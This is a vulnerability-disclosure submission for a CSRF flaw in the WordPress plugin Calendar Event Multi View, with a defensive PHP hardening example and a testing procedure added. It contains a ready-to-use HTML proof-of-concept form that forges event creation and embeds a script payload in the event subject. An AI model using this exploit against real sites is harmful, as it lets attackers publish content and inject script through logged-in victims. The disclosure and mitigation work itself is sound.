Submit #43713: Cross-site Request Forgery (CSRF) vulnerability in Calendar Event Multi View plugin <=1.4.06 at WordPress

Title: Cross-site Request Forgery (CSRF) vulnerability in Calendar Event Multi View plugin <=1.4.06 at WordPress.
Description:

# Exploit Title: Cross-site Request Forgery (CSRF) vulnerability in Calendar Event Multi View plugin <=1.4.06 at WordPress.
# Exploit Author: Mostafa Farzaneh (Mr.Pyweb)
# Web Site: https://wordpress.dwbooster.com/calendars/cp-multi-view-calendar
# Software Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/
# Version : 1.4.06
# Tested on: Windows 10
# Category: WebApp
# Date: 2022-05-25
# Description: A Cross-site Request Forgery (CSRF) vulnerability has been identified in the Calendar Event Multi View plugin that allows an attacker to create an event and publish it on the site.

POC and exploit code:

```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://target.com/wp/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=1&method=adddetails&id=2" method="POST">
  <input type="hidden" name="Subject" value="&lt;script&gt;alert&#40;origin&#41;&lt;&#47;script&gt;" />
  <input type="hidden" name="colorvalue" value="&#35;C60" />
  <input type="hidden" name="rrule" value="" />
  <input type="hidden" name="rruleType" value="" />
  <input type="hidden" name="stpartdate" value="05&#47;10&#47;2022" />
  <input type="hidden" name="stparttime" value="00&#58;00" />
  <input type="hidden" name="etpartdate" value="05&#47;16&#47;2022" />
  <input type="hidden" name="etparttime" value="00&#58;00" />
  <input type="hidden" name="stpartdatelast" value="05&#47;10&#47;2022" />
  <input type="hidden" name="etpartdatelast" value="05&#47;16&#47;2022" />
  <input type="hidden" name="stparttimelast" value="" />
  <input type="hidden" name="etparttimelast" value="" />
  <input type="hidden" name="IsAllDayEvent" value="1" />
  <input type="hidden" name="Location" value="CSRF" />
  <input type="hidden" name="Description" value="CSRF " />
  <input type="hidden" name="timezone" value="4&#46;5" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>
```
User: pyweb-security (UID 11883)
Submitted: 15.08.2022 12:20 (4 years ago)
Moderated: 16.08.2022 15:53 (1 day later)
Status: Accepted
VulDB Entry: 206488 [Calendar Event Multi View Plugin on WordPress Cross Site Request Forgery]
Points: 17
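The PoC above works because the event-creation endpoint accepts a state-changing POST from any origin with nothing but the victim's session cookie. The following is an added example, not the plugin's own code: a generic WordPress handler for an "add event" action, first in the CSRF-prone shape and then hardened with a WordPress nonce plus a capability check. The function names (`cpmvc_example_*`), the nonce action name, the `cpmvc_event` post type and the `admin-post.php` routing are assumptions for illustration; only the POST field names are taken from the PoC.

```php
<?php
// Added example, not Calendar Event Multi View's real code. Every function
// name, the nonce action and the post type below are illustrative.
// WordPress APIs used (wp_verify_nonce, wp_nonce_field, current_user_can,
// sanitize_text_field, wp_unslash, wp_insert_post, wp_die, add_action) are real.

// Illustrative storage: persist the event as a custom post.
function cpmvc_example_store_event( array $event ) {
    return wp_insert_post( array(
        'post_type'    => 'cpmvc_event',
        'post_status'  => 'publish',
        'post_title'   => $event['subject'],
        'post_content' => $event['description'],
        'meta_input'   => array(
            'location' => $event['location'],
            'start'    => $event['start'],
            'end'      => $event['end'],
        ),
    ) );
}

// CSRF-prone shape: any POST that reaches this handler creates an event.
// A logged-in user who loads the attacker's page submits it with their
// cookies, and nothing here proves the request was intended by that user.
function cpmvc_example_add_event_vulnerable() {
    $event = array(
        'subject'     => $_POST['Subject'] ?? '',
        'description' => $_POST['Description'] ?? '',
        'location'    => $_POST['Location'] ?? '',
        'start'       => $_POST['stpartdate'] ?? '',
        'end'         => $_POST['etpartdate'] ?? '',
    );
    return cpmvc_example_store_event( $event );
}

// Hardened shape: reject the request unless it carries a nonce minted for this
// action and the user is authorized. Both checks run before any write.
function cpmvc_example_add_event_hardened() {
    // 1. Anti-CSRF nonce. wp_nonce_field() below emits it into the plugin's own
    //    form; it is bound to the action name and the logged-in user, so a
    //    cross-site form cannot know it. A missing or stale nonce fails here.
    $nonce = isset( $_POST['_cpmvc_nonce'] )
        ? sanitize_text_field( wp_unslash( $_POST['_cpmvc_nonce'] ) )
        : '';
    if ( ! wp_verify_nonce( $nonce, 'cpmvc_add_event' ) ) {
        wp_die( 'Invalid request: missing or stale nonce.', 'Forbidden', array( 'response' => 403 ) );
    }

    // 2. Authorization. The nonce proves intent, not privilege; a subscriber
    //    with a valid nonce must still not be able to publish events.
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_die( 'Insufficient privileges.', 'Forbidden', array( 'response' => 403 ) );
    }

    // 3. Sanitize on input (and escape with esc_html() on output) so the
    //    subject is stored and rendered as plain text.
    $event = array(
        'subject'     => sanitize_text_field( wp_unslash( $_POST['Subject'] ?? '' ) ),
        'description' => sanitize_textarea_field( wp_unslash( $_POST['Description'] ?? '' ) ),
        'location'    => sanitize_text_field( wp_unslash( $_POST['Location'] ?? '' ) ),
        'start'       => sanitize_text_field( wp_unslash( $_POST['stpartdate'] ?? '' ) ),
        'end'         => sanitize_text_field( wp_unslash( $_POST['etpartdate'] ?? '' ) ),
    );
    return cpmvc_example_store_event( $event );
}

// The plugin's own form: the only place the nonce is emitted.
function cpmvc_example_render_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="cpmvc_example_add_event" />';
    wp_nonce_field( 'cpmvc_add_event', '_cpmvc_nonce' ); // adds _cpmvc_nonce + _wp_http_referer
    echo '<input type="text" name="Subject" />';
    echo '<input type="text" name="Location" />';
    echo '<textarea name="Description"></textarea>';
    echo '<input type="text" name="stpartdate" /><input type="text" name="etpartdate" />';
    echo '<input type="submit" value="Add event" />';
    echo '</form>';
}

// Route the hardened handler through admin-post.php (logged-in users only).
add_action( 'admin_post_cpmvc_example_add_event', 'cpmvc_example_add_event_hardened' );
```

To check whether a handler is exposed this way, replay a captured add-event request with every nonce-like parameter stripped and the `Referer` header removed: if the event is still created, the endpoint has no server-side proof of intent and the PoC form above will work against any logged-in user who visits the attacker's page. Note that the nonce is what defeats CSRF; a `SameSite` cookie attribute on the session is a useful defense in depth but not a substitute.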
